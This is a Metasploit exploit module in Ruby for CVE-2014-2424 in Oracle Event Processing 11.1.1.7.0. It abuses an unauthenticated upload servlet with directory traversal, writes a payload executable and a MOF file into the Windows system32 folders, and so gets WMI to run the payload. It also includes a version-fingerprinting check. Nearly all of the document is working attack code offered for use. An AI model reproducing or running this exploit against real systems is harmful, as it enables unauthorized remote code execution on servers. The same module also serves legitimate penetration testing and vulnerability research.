require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit:: EXE
include Msf::Exploit::WbemExec
include Msf::Exploit::FileDropper
def initialize(info = {})
super (update_info(info,
'Name' => 'Oracle Event Processing FileUploadServlet Arbitrary File Upload' ,
'Description' => %q{
This module exploits an Arbitrary File Upload vulnerability in Oracle Event Processing
11 . 1 . 1 . 7 . 0 . The FileUploadServlet component, which requires no authentication, can be
abused to upload a malicious file onto an arbitrary location due to a directory traversal
flaw, and compromise the server. By default Oracle Event Processing uses a Jetty
Application Server without JSP support, which limits the attack to WbemExec. The current
WbemExec technique only requires arbitrary write to the file system, but at the moment the
module only supports Windows 2003 SP2 or older.
},
'License' => MSF_LICENSE ,
'Author' =>
[
'rgod <rgod[at]autistici.org>' ,
'juan vazquez'
],
'References' =>
[
[ 'CVE' , '2014-2424' ],
[ 'ZDI' , '14-106' ],
[ 'BID' , '66871' ],
],
'DefaultOptions' =>
{
'WfsDelay' => 5
},
'Payload' =>
{
'DisableNops' => true ,
'Space' => 2048
},
'Platform' => 'win' ,
'Arch' => ARCH_X86 ,
'Targets' =>
[
[ 'Oracle Event Processing 11.1.1.7.0 / Windows 2003 SP2 through WMI' , {}]
],
'DefaultTarget' => 0 ,
'DisclosureDate' => 'Apr 21 2014' ))
register_options(
[
Opt:: RPORT ( 9002 ),
OptInt. new ( 'DEPTH' , [ true , 'Traversal depth' , 7 ])
], self . class )
end
def upload(file_name, contents)
post_data = Rex:: MIME ::Message. new
post_data.add_part(rand_text_alpha( 4 + rand( 4 )), nil , nil , "form-data; name=\"Filename\"" )
post_data.add_part(contents, "application/octet-stream" , "binary" , "form-data; name=\"uploadfile\"; filename=\"#{file_name}\"" )
data = post_data.to_s
res = send_request_cgi({
'uri' => '/wlevs/visualizer/upload' ,
'method' => 'POST' ,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}" ,
'data' => data
})
res
end
def traversal
"../" * datastore[ 'DEPTH' ]
end
def exploit
print_status( "#{peer} - Generating payload and mof file..." )
mof_name = "#{rand_text_alpha(rand(5)+5)}.mof"
exe_name = "#{rand_text_alpha(rand(5)+5)}.exe"
exe_content = generate_payload_exe
mof_content = generate_mof(mof_name, exe_name)
print_status( "#{peer} - Uploading the exe payload #{exe_name}..." )
exe_traversal = "#{traversal}WINDOWS/system32/#{exe_name}"
res = upload(exe_traversal, exe_content)
unless res && res.code == 200 && res.body.blank?
print_error( "#{peer} - Unexpected answer, trying anyway..." )
end
register_file_for_cleanup(exe_name)
print_status( "#{peer} - Uploading the MOF file #{mof_name}" )
mof_traversal = "#{traversal}WINDOWS/system32/wbem/mof/#{mof_name}"
upload(mof_traversal, mof_content)
register_file_for_cleanup( "wbem/mof/good/#{mof_name}" )
end
def check
res = send_request_cgi({
'uri' => '/ohw/help/state' ,
'method' => 'GET' ,
'vars_get' => {
'navSetId' => 'cepvi' ,
'navId' => '0' ,
'destination' => ''
}
})
if res && res.code == 200
if res.body.to_s.include?( "Oracle Event Processing 11g Release 1 (11.1.1.7.0)" )
return Exploit::CheckCode::Detected
elsif res.body.to_s.include?( "Oracle Event Processing 12" )
return Exploit::CheckCode::Safe
end
end
Exploit::CheckCode::Unknown
end
end
|